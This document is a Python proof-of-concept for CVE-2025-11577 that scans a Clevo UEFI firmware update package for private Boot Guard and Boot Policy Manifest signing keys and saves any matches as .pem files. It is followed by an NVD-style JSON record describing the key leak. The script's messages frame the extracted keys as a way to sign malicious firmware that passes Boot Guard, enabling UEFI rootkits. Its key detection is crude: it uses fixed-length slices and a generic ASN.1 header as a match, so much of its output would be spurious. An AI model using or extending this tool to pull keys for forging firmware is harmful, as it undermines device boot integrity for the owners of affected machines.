CVE-2025-11577

# CVE-2025-11577 PoC - Clevo UEFI Private Key Extraction # This PoC demonstrates extracting private signing keys from Clevo UEFI firmware update packages import os import struct import hashlib # Step 1: Download or obtain the Clevo firmware update package (e.g., B10717.exe) # The firmware update package inadvertently contains private signing keys firmware_package = "B10717.exe" def extract_uefi_image(firmware_path): """Extract UEFI firmware image from the update package""" print(f"[*] Extracting UEFI image from {firmware_path}") # UEFI firmware is typically stored as a FIT (Firmware Interface Table) or # as a raw SPI flash image within the update package with open(firmware_path, 'rb') as f: data = f.read() return data def find_boot_guard_keys(firmware_data): """ Search for Boot Guard private keys in firmware data. Boot Guard keys are typically RSA-2048 or RSA-3072 keys stored in PKCS#8 or PKCS#12 format within the firmware volume. """ print("[*] Searching for Boot Guard signing keys...") # Common patterns for private key markers in UEFI firmware key_patterns = [ b'-----BEGIN PRIVATE KEY-----', b'-----BEGIN RSA PRIVATE KEY-----', b'-----BEGIN ENCRYPTED PRIVATE KEY-----', # Intel Boot Guard key signature patterns b'\x30\x82', # ASN.1 SEQUENCE header (typical for RSA keys) ] found_keys = [] for pattern in key_patterns: offset = 0 while True: pos = firmware_data.find(pattern, offset) if pos == -1: break # Extract potential key data (look for PEM end marker or fixed length) key_data = firmware_data[pos:pos+2048] # RSA-2048 key size found_keys.append({ 'offset': pos, 'data': key_data, 'type': 'Boot Guard Private Key (suspected)' }) print(f"[+] Found potential key at offset 0x{pos:08x}") offset = pos + 1 return found_keys def find_bpm_signing_key(firmware_data): """ Extract Boot Policy Manifest (BPM) signing key. BPM contains key manifests and signature used during boot verification. """ print("[*] Searching for Boot Policy Manifest signing key...") # BPM structure contains KeyManifestSignature # Look for BPM signature element markers bpm_marker = b'\x00\x00\x00\x00BPMS' pos = firmware_data.find(bpm_marker) if pos != -1: print(f"[+] Found BPM structure at offset 0x{pos:08x}") # Extract signing key from BPM structure return firmware_data[pos:pos+4096] return None def main(): print("=" * 60) print("CVE-2025-11577 - Clevo UEFI Key Extraction PoC") print("WARNING: For authorized security testing only") print("=" * 60) if not os.path.exists(firmware_package): print(f"[-] Firmware package {firmware_package} not found") print("[*] Please download from official Clevo support site") return # Extract firmware image firmware_data = extract_uefi_image(firmware_package) print(f"[*] Firmware size: {len(firmware_data)} bytes") # Find Boot Guard private keys bg_keys = find_boot_guard_keys(firmware_data) print(f"\n[*] Found {len(bg_keys)} potential Boot Guard keys") # Find BPM signing key bpm_key = find_bpm_signing_key(firmware_data) if bpm_key: print(f"[+] BPM signing key extracted") # Demonstrate attack: sign malicious firmware with extracted key if bg_keys: print("\n[!] CRITICAL: Private keys found!") print("[!] An attacker could use these keys to sign malicious UEFI") print("[!] firmware that passes Boot Guard verification.") print("[!] This enables UEFI implant/rootkit installation.") # Save extracted keys for analysis for i, key in enumerate(bg_keys): with open(f'extracted_key_{i}.pem', 'wb') as f: f.write(key['data']) print(f"[*] Saved extracted key to extracted_key_{i}.pem") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11577", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:36.317", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Clevo’s UEFI firmware update packages, including B10717.exe, inadvertently contained private signing keys used for Boot Guard and Boot Policy Manifest verification. The exposure of these keys could allow attackers to sign malicious firmware that appears trusted by affected systems, undermining the integrity of the early boot process."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 6.0}]}, "references": [{"url": "https://www.binarly.io/advisories/brly-2025-002", "source": "[email protected]"}, {"url": "https://www.kb.cert.org/vuls/id/538470", "source": "[email protected]"}]}}